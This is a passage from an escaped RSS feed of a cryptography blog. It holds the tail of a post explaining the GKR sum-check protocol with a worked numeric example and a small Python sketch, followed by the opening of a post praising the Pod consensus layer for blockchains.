&amp;amp; \quad \times (3(1 - c_1)(1 - c_2) + 6(1 - c_1)c_2 + 4c_1(1 - c_2) + 3c_1c_2) \Big]&lt;br &#x2F;&gt;
\end{align}&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
Now we leave $b_1$ free (it becomes the variable $z$) and let $b_2, c_1, c_2$ range over $\{0,1\}$:&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$b_2$&lt;&#x2F;th&gt;&lt;th&gt;$c_1$&lt;&#x2F;th&gt;&lt;th&gt;$c_2$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;blockquote&gt;
&lt;p&gt;Due to the multiplicative factors (for example, terms like&lt;br &#x2F;&gt;
$$2b_1(1 - b_2)c_1c_2$$&lt;br &#x2F;&gt;
vanish unless $(c_1 = c_2 = 1)$ in the first term, and similarly in the second term), most combinations will contribute zero. In our case, let’s assume that after substitution, the only nonzero contributions come from:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Case 1:** When $(b_2, c_1, c_2) = (0, 1, 1)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Case 2:** When $(b_2, c_1, c_2) = (0, 0, 1)$  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We now analyze these cases separately.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Case 1: $(b_2, c_1, c_2) = (0, 1, 1)$&lt;br &#x2F;&gt;
$$2b_1 [3(1-b_1)+4b_1+3] \to 2x(x + 6)\to 2x^2 +12x$$&lt;br &#x2F;&gt;
Case 2: $(b_2, c_1, c_2) = (0, 0, 1)$&lt;br &#x2F;&gt;
$$-(1-b_1) [3(1 - b_1)+ 4b_1 ]6 \to -6(1 - x)(3 - 3x + 4x) \to (- 6 + 6x)(x + 3)$$&lt;br &#x2F;&gt;
The sum leads to:&lt;br &#x2F;&gt;
$$g_1(z) = 8z^2 + 24z - 18 \equiv 8z^2 + z - 18$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;The prover sends this polynomial (its low degree allows sending its coefficients directly) to the verifier.&lt;&#x2F;p&gt;
&lt;p&gt;The verifier checks two things:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * That $g_1$ is indeed a low-degree polynomial.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * That:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$g_1(0) + g_1(1) = m_0.$$&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;In our example: $$g_1(0) = -18$$ $$g_1(1) = 14$$ $$g_1(0) + g_1(1) = -4 \equiv 19 = m_0.$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The verifier $\mathcal{V}$ chooses a random value $s_1 \in \mathbb{F_{p}}$ and sends it to the prover $\mathcal{P}$ . The verifier also computes:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$g_1(s_1) = C_1$$&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;We can sample $s_1$ = 3: $$g_1(s_1) = g_1(3) = 8 \cdot 3^2 + 24 \cdot 3 - 18 = 126 \equiv 11.$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Upon receiving $s_1$, $\mathcal{P}$ computes $C_1$ and then repeats a similar procedure. The prover defines a new function:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$g_2(z): \mathbb{F_{p}} \to \mathbb{F_{p}}$$&lt;br &#x2F;&gt;
$$g_2(z) := \sum_{(x_3, \ldots , x_{2k_1}) \in \{0,1\}^{2k_1 - 2}} \tilde f_{r_0}^{(0)} (s_1, z, x_3, \ldots, x_{ 2k_1 })$$&lt;&#x2F;p&gt;
&lt;p&gt;Here, the prover fixes the first variable to $s_1$ and leaves the second variable free (denoted by $z$), summing over the remaining binary assignments.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;We have:&lt;br &#x2F;&gt;
$$g_2(z) = \sum_{(x_3, x_4) \in \{0,1\}^{2}} \tilde f_{ r_0 }^{(0)} (s_1, z, x_3, x_4)$$&lt;br &#x2F;&gt;
$$g_2(z) = 162z^2 - 288z + 126 \equiv z^2 - 12z + 11.$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. The prover $\mathcal{P}$ sends the coefficients of $g_2(z)$ to the $\mathcal{V}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. The verifier checks that:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$g_2(0) + g_2(1) = C_1$$&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;In our example: $$g_2(0) = 11$$ $$g_2(1) = 0$$ $$g_2(0) + g_2(1) = 11 = C_1.$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. This procedure is repeated until the verifier receives  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$C_{2k_1}$:&lt;&#x2F;p&gt;
&lt;p&gt;$$C_{ 2k_1 } := \tilde f_{ r_0 }^{(0)} (s_1, s_2, \ldots, s_{ 2k_1 })$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;This is the final step of the Sum-Check protocol.&lt;&#x2F;strong&gt; At this point, the verifier would normally query an oracle to compute this value directly; however, in our protocol, the verifier can’t evaluate the function directly.&lt;&#x2F;p&gt;
&lt;p&gt;The verifier can build $\widetilde{\text{Add}}_i$ and $\widetilde{\text{Mult}}_i$, but cannot evaluate $\tilde W_{i+1}$, which represents the values of the nodes in the next layer.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-have-we-achieved&quot;&gt;What Have We Achieved?&lt;&#x2F;h2&gt;
&lt;p&gt;In effect, we have reduced the problem of verifying the circuit’s outputs to verifying the values one layer lower. This reduction is repeated layer by layer until the final layer is reached, which corresponds to the inputs the verifier already knows. This is the whole idea behind the protocol.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Let’s do the math for our example:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{V}$ samples $s_2 = 2$ and sends it to $\mathcal{P}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{V}$ and $\mathcal{P}$ calculate $C_2 = g_2(s_2)$:$$g_2(s_2) = g_2(2) = 2^2 - 12 \cdot 2 + 11 = -9 \equiv 14.$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{P}$ calculates:$$g_3(z) = \sum_{x_4 \in \{0,1\}} \tilde f_{ r_0 }^{(0)} (s_1, s_2, z, x_4)$$ $$g_3(z) = 90z^2 - 180z + 144 \equiv 21z^2 - 19z + 6$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{V}$ receives $g_3(z)$ and checks:$$g_3(0) = 6 $$ $$ g_3(1) = 8 $$ $$g_3(0) + g_3(1) = 14$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{V}$ samples $s_3 = 4$ and sends it to $\mathcal{P}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{V}$ and $\mathcal{P}$ calculate $C_3 = g_3(s_3)$:  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$g_3(s_3) = 21 \cdot 4^2 - 19 \cdot 4 + 6 = 266 \equiv 13$$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{P}$ calculates:  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$g_4(z) = \tilde f_{r_0}^{(0)} (s_1, s_2, s_3, z)$$ $$g_4(z) = -288z^2 + 1152z \equiv 11z^2 + 2z$$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{V}$ receives $g_4(z)$ and checks:  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$g_4(0) = 0$$ $$g_4(1) = 13 $$ $$g_4(0) + g_4(1) = 13$$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{V}$ samples $s_4 = 7$ and sends it to $\mathcal{P}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{V}$ and $\mathcal{P}$ calculate $C_4 = g_4(s_4)$:  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$g_4(s_4) = 553 \equiv 1$$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{P}$ calculates  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$\tilde f^{(0)}_{r_0}(s_1,s_2,s_3,s_4) = C_4$$&lt;br &#x2F;&gt;
$$\begin{equation}&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
\tilde{f}^{(0)}(r_0,s_1,s_2,s_3,s_4) := &amp;amp; \newline \widetilde{\text{Add}}_1(r_0,s_1,s_2,s_3,s_4) \cdot (\tilde{W}_2(s_1,s_2) + \tilde{W}_2(s_3,s_4)) \newline&lt;br &#x2F;&gt;
&amp;amp; + \widetilde{\text{Mult}}_1(r_0,s_1,s_2,s_3,s_4) \cdot \tilde{W}_2(s_1,s_2) \cdot \tilde{W}_2(s_3,s_4)&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
\end{equation}$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;h2 id=&quot;part-four-recursion&quot;&gt;Part four: Recursion&lt;&#x2F;h2&gt;
&lt;p&gt;We reached a stage where the verifier’s goal is to check that&lt;&#x2F;p&gt;
&lt;p&gt;$$\tilde f_{ r_0 }^{(0)} (s_1, s_2, s_3, …, s_{2k_{i + 1}}) = C_{2k_{i + 1}}$$&lt;&#x2F;p&gt;
&lt;p&gt;However, to do so, the verifier would need to know:&lt;&#x2F;p&gt;
&lt;p&gt;$$\tilde W_2(s_1, s_2, … , s_{k})$$ $$\tilde W_2(s_{k + 1}, … , s_{2k})$$&lt;&#x2F;p&gt;
&lt;p&gt;If the verifier were to perform two separate sum-checks for these values, the final workload would be excessive. Instead, the prover makes a single claim at one point. How?&lt;&#x2F;p&gt;
&lt;p&gt;Both parties compute the unique function&lt;&#x2F;p&gt;
&lt;p&gt;$$\ell: \mathbb{F} \to \mathbb{F}^{k}$$&lt;&#x2F;p&gt;
&lt;p&gt;such that:&lt;&#x2F;p&gt;
&lt;p&gt;$$\ell(0) = (s_1, s_2, … , s_{k})$$ $$\ell(1) = (s_{k + 1}, … , s_{2k})$$&lt;&#x2F;p&gt;
&lt;p&gt;Then $\mathcal{P}$ sends the function&lt;br &#x2F;&gt;
$$q = \tilde W_2 \circ \ell : \mathbb{F} \to \mathbb{F}$$&lt;&#x2F;p&gt;
&lt;p&gt;to the verifier. Notice that:&lt;&#x2F;p&gt;
&lt;p&gt;$$q(0) = \tilde W_2(s_1, s_2, … , s_{k})$$ $$q(1) = \tilde W_2(s_{k+1}, … , s_{2k})$$&lt;&#x2F;p&gt;
&lt;p&gt;Thus, by knowing $q(x)$, the verifier can recover the necessary values $q(0)$ and $q(1)$ to complete the final evaluation in the Sum-Check protocol.&lt;&#x2F;p&gt;
&lt;p&gt;But how does the verifier know that $q(x)$ is correct? Again, $\mathcal{V}$ samples a random element $r^* \in \mathbb{F}$ and computes&lt;&#x2F;p&gt;
&lt;p&gt;$$r_1 = \ell (r^*)$$&lt;&#x2F;p&gt;
&lt;p&gt;Then, $\mathcal{P}$ and $\mathcal{V}$ compute:&lt;&#x2F;p&gt;
&lt;p&gt;$$m_1 = q(r^*)$$&lt;&#x2F;p&gt;
&lt;p&gt;Now, the prover’s task is to convince the verifier that:&lt;&#x2F;p&gt;
&lt;p&gt;$$\tilde W_2(r_1) = m_1$$&lt;&#x2F;p&gt;
&lt;p&gt;This claim is analogous to our initial verification step:&lt;&#x2F;p&gt;
&lt;p&gt;$$\tilde D(r_0) = m_0$$&lt;&#x2F;p&gt;
&lt;p&gt;where $\tilde D(x)$ encoded the output values and now $\tilde W_2(x)$ encodes the values of the nodes in the immediately preceding layer.&lt;&#x2F;p&gt;
&lt;p&gt;Thus, the remaining task is to apply the same Sum-Check protocol to this new layer.&lt;&#x2F;p&gt;
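&lt;p&gt;Before moving on, the line-restriction trick above can be made concrete in a few lines of Python over $\mathbb{F}_{23}$, the field used in the worked example below. This is only our sketch: the layer values in &lt;em&gt;w&lt;&#x2F;em&gt; are made up for illustration, while the challenges $s_1, \dots, s_4$ and the point $\ell(6) = (9, 9)$ are taken from the example.&lt;&#x2F;p&gt;

```python
# Line restriction in the GKR recursion, over F_23 (the field of the example).
# mle2 is the multilinear extension of made-up layer values w (an assumption);
# ell is the unique line with ell(0) = (s1, s2) and ell(1) = (s3, s4).
P = 23

def mle2(w, x, y):
    # Multilinear extension of w: {0,1}^2 -> F_23, evaluated at (x, y).
    w00, w01, w10, w11 = w
    return (w00 * (1 - x) * (1 - y) + w01 * (1 - x) * y
            + w10 * x * (1 - y) + w11 * x * y) % P

w = (5, 7, 2, 11)             # hypothetical layer values (not from the article)
s1, s2, s3, s4 = 3, 2, 4, 7   # sum-check challenges from the worked example

def ell(x):
    # The unique line through (s1, s2) at x = 0 and (s3, s4) at x = 1.
    return ((s1 * (1 - x) + s3 * x) % P, (s2 * (1 - x) + s4 * x) % P)

def q(x):
    # q = (multilinear extension) composed with ell: the univariate
    # function the prover sends instead of two separate evaluations.
    return mle2(w, *ell(x))

# q(0) and q(1) are exactly the two evaluations the verifier needs,
# and the line passes through the example's point r_1 = ell(6) = (9, 9).
assert q(0) == mle2(w, s1, s2)
assert q(1) == mle2(w, s3, s4)
assert ell(6) == (9, 9)
```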
&lt;blockquote&gt;
&lt;p&gt;For our circuit:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{P}$ and $\mathcal{V}$ calculate:  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$\ell(0) = (s_1, s_2) = (3, 2)$$ $$ \ell(1) = (s_3, s_4) = (4, 7)$$ $$\ell(x) = (s_1(1-x) + s_3x, s_2(1-x) + s_4x) = (3(1-x) + 4x, 2(1-x) + 7x).$$
* $\mathcal{P}$ sends $q= \tilde W_1 \circ \ell : \mathbb{F} \to \mathbb{F}.$&lt;br &#x2F;&gt;
$$q(x) = -20x^2 -52x - 12 \equiv 3x^2 + 17x + 11$$
* $\mathcal{V}$ checks $\tilde f_{r_0}^{(0)} (s_1, s_2, s_3, s_4) = c_4$ using $q(x)$
* $\mathcal{V}$ sends $\mathcal{P}$ a random $r^* \in \mathbb{F}$&lt;br &#x2F;&gt;
$$r^* = 6$$
* $\mathcal{V}$ and $\mathcal{P}$ calculate:&lt;br &#x2F;&gt;
$$r_1 = \ell (6) = (9, 32) \equiv (9,9)$$ $$m_1 = q(6) = 14.$$
* Now $\mathcal{P}$ needs to convince $\mathcal{V}$ that:&lt;br &#x2F;&gt;
$$\sum_{(b, c) \in \{0, 1\}^{2 \cdot 1}} f_{r_1}^{(1)} (b, c) = m_1$$
* $\mathcal{P}$ calculates $g_1(z)$ and sends it to $\mathcal{V}$ :&lt;br &#x2F;&gt;
$$g_1(z) = \sum_{x_2 \in \{0, 1\}} f_{r_1}^{(1)} (z, x_2)$$ $$g_1(z) = 2z^2 + 7z + 14$$
* $\mathcal{V}$ checks $g_1(0) + g_1(1) = m_1$:&lt;br &#x2F;&gt;
$$ g_1(0) = 14 $$ $$ g_1(1) = 0 $$ $$ g_1(0) + g_1(1) = 14$$
* $\mathcal{V}$ samples $s_1 = 12$ and sends it to $\mathcal{P}$.
* $\mathcal{V}$ and $\mathcal{P}$ calculate $C_1 = g_1(s_1)$:&lt;br &#x2F;&gt;
$$g_1(12) = 2 \cdot 12^2 + 7 \cdot 12 + 14 = 386 \equiv 18$$
* $\mathcal{P}$ calculates $g_2(z)$ and sends it to $\mathcal{V}$:&lt;br &#x2F;&gt;
$$g_2(z) = \tilde f_{r_1}^{(1)} (s_1, z)$$ $$g_2(z) = 9z^2 + z +4$$
* $\mathcal{V}$ checks $g_2(0) + g_2(1) = C_1$:&lt;br &#x2F;&gt;
$$g_2(0) = 4$$ $$g_2 (1) = 14$$ $$ g_2(0) + g_2(1) = 18$$
* $\mathcal{V}$ samples $s_2 = 5$ and sends it to $\mathcal{P}$.
* $\mathcal{V}$ and $\mathcal{P}$ calculate $C_2 = g_2(s_2)$:&lt;br &#x2F;&gt;
$$C_2 = g_2(5) = 4$$
* $\mathcal{P}$ and $\mathcal{V}$ calculate:&lt;br &#x2F;&gt;
$$ \ell(0) = s_1 = 12$$ $$ \ell(1) = s_2 = 5$$ $$\ell(x) = -7x + 12$$
* $\mathcal{P}$ sends $q= \tilde W_2 \circ \ell : \mathbb{F} \to \mathbb{F}.$&lt;br &#x2F;&gt;
$$q(x) = 3(1 - (-7x + 12) ) + (-7x +12)$$
* $\mathcal{V}$ checks $\tilde f_{r_1}^{(1)}(s_1,s_2) = C_2$ using $q(x)$
* $\mathcal{V}$ sends $\mathcal{P}$ a random $r^* \in \mathbb{F}$&lt;br &#x2F;&gt;
$$r^* = 17$$
* $\mathcal{V}$ and $\mathcal{P}$ calculate:&lt;br &#x2F;&gt;
$$r_2 = \ell (17) = 8$$ $$m_2 = q(17) = 10$$
* Finally, $\mathcal{V}$ calculates $\tilde W_2(x)$ and checks $\tilde W_2(r_2) = m_2$&lt;br &#x2F;&gt;
$$W_2(0) = 3$$ $$W_2(1) = 1$$ $$\tilde W_2(x) = 3(1 - x) + x$$ $$\tilde W_2(8) = 10$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;h2 id=&quot;last-part-repeat&quot;&gt;Last part: repeat&lt;&#x2F;h2&gt;
&lt;p&gt;Well, everything is almost ready! We just need to repeat this procedure once per layer. Finally, $W_d(x)$ is the function that maps the program’s inputs, which we will use to verify the sum-check of layer $d-1$. If this check is correct, it means that all the previous ones are also correct, so we can confidently say that the computation was executed correctly.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;In summary, the GKR protocol elegantly reduces the problem of verifying the output of a complex arithmetic circuit into a series of simpler verifications that recursively move from the output layer to the input layer. Each step relies on algebraic properties—most notably, the uniqueness of multilinear extensions and the Schwartz–Zippel lemma—to ensure that a resource-limited verifier can efficiently confirm the correctness of the computation. This protocol illustrates the power of interactive proofs and lays the foundation for more advanced cryptographic applications such as zero-knowledge proofs.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Why we believe that Pod, an optimal-latency, censorship-free, and accountable generalized consensus layer, is a groundbreaking technology for blockchains and distributed systems</title>
          <pubDate>Thu, 13 Feb 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/why-we-believe-that-pod-an-optimal-latency-censorship-free-and-accountable-generalized-consensus-layer-is-a-groundbreaking-technology-for-blockchains-and-distributed-systems/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/why-we-believe-that-pod-an-optimal-latency-censorship-free-and-accountable-generalized-consensus-layer-is-a-groundbreaking-technology-for-blockchains-and-distributed-systems/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/why-we-believe-that-pod-an-optimal-latency-censorship-free-and-accountable-generalized-consensus-layer-is-a-groundbreaking-technology-for-blockchains-and-distributed-systems/">&lt;p&gt;&lt;strong&gt;TL;DR:&lt;&#x2F;strong&gt; This post discusses &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;2501.14931&quot;&gt;Pod&lt;&#x2F;a&gt;, a new notion of consensus that achieves the optimal latency of one round trip (about 200 ms) by removing inter-replica communication. We believe this paper and the work by the pod network team are groundbreaking, and we want others to share our excitement and passion for their work; that is why we wrote up our understanding of what they have found and created.&lt;&#x2F;p&gt;
&lt;p&gt;The construction is simple and can be implemented in a few hundred lines of Rust. While it has weaker properties than total-order broadcast, it remains censorship-resistant against Byzantine replicas, provides accountability for safety violations, and achieves low latency. In simpler terms, Pod removes consensus from the blockchain equation and allows transactions to happen as fast as ordinary searches on the web. This enables several applications, such as payments, auctions, and decentralized data stores.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;introduction-the-problem-of-consensus-in-blockchain&quot;&gt;Introduction: The Problem of Consensus in Blockchain&lt;&#x2F;h2&gt;
&lt;p&gt;Blockchain technology has revolutionized the way we think about decentralized trust and distributed ledgers. At its heart lies the problem of consensus—the mechanism by which a network of untrusted parties agrees on the state of a shared ledger. Consensus protocols are responsible for ensuring that every transaction is confirmed, ordered, and irrevocably recorded while preserving key properties such as safety (no two honest nodes disagree on the ledger’s content) and liveness (transactions submitted by honest parties eventually become part of the ledger). One of the reasons why consensus is introduced is to prevent double spending: a party could sign two transactions using the same funds and try to have them approved by the ledger, effectively creating money out of thin air. The fact that one transaction must come before another prevents this, but we will see that consensus is not necessary to achieve this.&lt;&#x2F;p&gt;
&lt;p&gt;In classical distributed systems, consensus has been studied for decades, giving rise to robust algorithms that guarantee agreement among a small set of trusted parties. However, blockchains must operate in an open, permissionless setting where nodes may be geographically dispersed, and some may behave maliciously. The result is that consensus in blockchains must address several additional challenges:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Scalability and Throughput:** Many early blockchains—most notably Bitcoin—suffer from severe throughput limitations (e.g., around 7 transactions per second) and high latency (e.g., waiting up to 10 minutes for finality). These numbers pale in comparison to conventional payment systems like Visa, which processes tens of thousands of transactions per second.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Security and Byzantine Fault Tolerance:** The consensus algorithm must tolerate Byzantine faults (arbitrary and potentially malicious behavior) while ensuring that honest nodes do not disagree on the ledger’s contents.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Latency and Finality:** In many applications, the time between a client’s submission of a transaction and the transaction’s irreversible finalization is critical. High latency not only degrades user experience but can also open the door to adversarial exploits such as front-running.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Economic Incentives and Censorship Resistance:** The design of consensus protocols must account for economic incentives. For example, leader-based systems (where one node is given the right to propose the next block) can be vulnerable to censorship or manipulation if the leader is bribed or coerced.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;These challenges have motivated researchers and practitioners to seek new designs that minimize latency and improve throughput without compromising security.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;classical-consensus-and-its-limitations&quot;&gt;Classical Consensus and Its Limitations&lt;&#x2F;h2&gt;
